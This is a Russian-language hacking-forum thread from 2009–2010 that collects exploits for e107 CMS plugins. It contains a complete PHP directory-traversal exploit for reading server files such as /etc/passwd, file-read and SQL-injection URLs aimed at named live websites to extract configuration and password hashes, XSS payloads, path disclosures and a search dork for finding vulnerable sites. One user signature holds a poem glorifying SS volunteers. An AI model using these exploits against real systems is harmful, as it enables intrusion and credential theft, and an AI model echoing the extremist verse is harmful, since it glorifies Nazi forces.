ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
e107 Plugin my_gallery 2.4.1 Exploit |

24.07.2009, 02:09
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме: 5516499
Репутация:
3702
|
|
e107 Plugin my_gallery 2.4.1 Exploit
e107 Plugin my_gallery 2.4.1 Exploit
Class: Input Validation Error
Remote: Yes
Vulnerable: e107.org my_gallery 2.4.1
e107.org my_gallery 2.3
e107.org my_gallery 0
Код:
<?php
/*
============================================
[o] e107 Plugin my_gallery 2.4.1 Exploit [o]
============================================
Bug [f]ound by NoGe - noge.code@gmail.com
Exploit [c]oded by Vrs-hCk - d00r@telkom.net
* Plugin my_gallery create photo gallery.
* Powered by Highslide JS script.
* With random gallery menu and navigation menu.
* Has a comment system, ratings and search of images.
Download e107 my_gallery 2.4.1 Plugin
http://code.google.com/p/e107mygalleryplugin/downloads/list
=============
[o] Usage [o]
=============
Web 2 XPL << fill with site who use e107 Plugin my_gallery
File 2 Read << fill with file or directory you want to read
Web 2 XPL : www.contoh.com
File 2 Read : /etc/passwd
Then Go!!!
==============
[o] Greetz [o]
==============
MainHack BrotherHood [ http://news.serverisdown.org ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
FUCK TERORIS!!
*/
$vuln = '/e107_plugins/my_gallery/image.php?file=';
$trasv = '/../../../../../../../../../../../../../../..';
echo "<form method=POST>
Web 2 XPL : <input type=\"text\" name=\"host\" size=30>
File 2 Read : <input type=\"text\" name=\"file\" size=30>
<input type=submit value=\"Go!!!\" name=\"_xpl\">
<br><br>";
if ($_POST['_xpl']) {
$data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "Connection: close\r\n\r\n";
$html = sendpacket($host,$data);
print '<pre>'.htmlspecialchars($html).'</pre>';
}
echo "</form>";
function sendpacket($host,$data) {
if (!$sock = @fsockopen($host,80)) {
die("[!] Connection refused, try again!\n");
}
fputs($sock,$data);
while (!feof($sock)) { $html .= fgets($sock); }
fclose($sock);
return $html;
}
?>
# milw0rm.com [2009-07-23]
|
|
|

26.08.2009, 15:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
Сообщение от Solide Snake
e107 Plugin my_gallery 2.4.1 Exploit
Class: Input Validation Error
Remote: Yes
Vulnerable: e107.org my_gallery 2.4.1
e107.org my_gallery 2.3
e107.org my_gallery 0
1.image.php?file='; это в файле image постом выше
2. Читалка файлов
Файл dload.php
PHP код:
<?php
$file = $_GET['file'];
$date_txt = date("y-m-d_H-i-s");
$text = "Content-Disposition: attachment; filename=".$_SERVER["SERVER_NAME"]."_e107_my_gallery_".$date_txt.".jpg";
header('Content-type: image/jpeg');
header($text);
readfile($file);
?>
все тоже самое тока в еще одном файле
Пример : __http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=/etc/passwd
там он вам даст сохранить картинку, сохраняем, открываем в блокноте и видим след строчки
Код:
<br />
<b>Warning</b>: readfile(\') [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in <b>/home/verrechi/public_html/e107_plugins/my_gallery/dload.php</b> on line <b>7</b><br />
*conf DB
http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php
Последний раз редактировалось HAXTA4OK; 26.08.2009 в 16:57..
|
|
|

29.08.2009, 14:56
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме: 2185909
Репутация:
308
|
|
На самом деле експлоит написан был раньше http://milw0rm.com/exploits/5308
http://www.obqvizapavlikeni.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php
|
|
|

19.09.2009, 19:54
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме: 5749763
Репутация:
1680
|
|
XSS в модуле YouTube Gallery(ytm_gallery):
Код:
e107_plugins/ytm_gallery/ytm.php?paging=<script>alert()</script>
© Nightmare
|
|
|

08.11.2009, 18:36
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме: 4532332
Репутация:
1196
|
|
e107(e107_v0.7.16_standart_RUS)
active XSS in comment's news
Код:
......./path/comment.php?comment.news.[id]
Submit comment
Subject: <script>alert(//)</script>
Comment: <script>alert(//)</script>
куки имеют вид:
1. 1a1dc91c907325c69271ddf0c944bc72
id. md5(pass)
при инстале префикс таблиц не фильтруется
Код:
mysql_query("INSERT INTO {$this->previous_steps['mysql']['prefix']}core VALUES ('SitePrefs_Backup', '{$tmp}')");
|
|
|

08.11.2009, 18:46
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме: 5749763
Репутация:
1680
|
|
активки не во всех сборках, в норм версиях фильтрация стоит.
|
|
|

08.11.2009, 19:12
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме: 3202832
Репутация:
1588
|
|
SQL injection in e107 cms
Version = v0.7 or later
SQL
http://localhost/plugins/userjournals_menu/userjournals.php?blog.[SQL]
1:
Код:
-1 union all select 1,2,null,4,5,6,@@version,8,9,0,11,12,13--
2:
Код:
-1 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--
bug site:
http://www.shanomaac.com/e107_plugins/userjournals_menu/userjournals.php?blog.-1%20union%20all%20select%201,2,null,4,5,6,@@versio n,8,9,0,11,12,13--
|
|
|

09.12.2009, 13:53
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме: 5516499
Репутация:
3702
|
|
Межсайтовый скриптинг e107 ветки 0.x
Код:
Referer: "><script>alert(document.cookie)</script>
(c)
|
|
|

27.04.2010, 22:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
e107_plugins
Расскрытие путей
При простом переходе на файл e107_plugins/e107shop/features.php
пример :
PHP код:
http://northfloridahomebuilder.com/e107_plugins/e107shop/features.php
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|

30.04.2010, 03:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме: 3363660
Репутация:
1148
|
|
AutoGallery v3.1_beta
[ скачано]
в гугле:
inurl:e107_plugins/autogallery
Результаты 1 - 10 из примерно 132 000
путь в информации!
http://e107/e107_plugins/autogallery/help.php
Z:\home\e107\www\e107_plugins\autogallery\Gallery
пути (бес параметров запрос послать!):
http://e107/e107_plugins/autogallery/xmlplaylist.php
http://e107/e107_plugins/autogallery/editaction.php
пассивная XSS
e107_plugins/autogallery/arcade.php
PHP код:
....
// Do different things when the flash game gives different requests
$sessdo = $_POST['sessdo'];
if ($sessdo != '')
{
// Session start to get the game name - $title
$microone = $_POST['microone'];
$score = $_POST['score'];
$gametime = $_POST['gametime'];
// Keep feeding that flash!
switch($sessdo)
{
case 'sessionstart':
// Give it some random crap it doesn't really need (the initbar figure and lastid)
echo "&connStatus=1&gametime=$gametime&initbar=6Z4&lastid=6&val=x";
exit;
break;
// Give it permission for... no apparent reason
case 'permrequest':
// Notice $microone = $score; -__VERY IMPORTANT__
$microone = $score;
echo "&validate=1µone=$microone";
exit;
break; ...
target:
http://[host]/[path]/e107_plugins/autogallery/arcade.php
Result (шлем POST!):
sessdo=sessionstart
gametime=<script>alert(/XSS/)</script>
или
sessdo=permrequest
microone=<script>alert(/XSS/)</script>
<form action="http://[host]/[path]/e107_plugins/autogallery/arcade.php" method="POST">
<input type=text name=sessdo value=sessionstart><br>
<input type=text name=gametime value='<script>alert(/XSS/)</script>'><br>
<input type=submit value=Отправить>
</form>
Последний раз редактировалось Strilo4ka; 30.04.2010 в 06:48..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|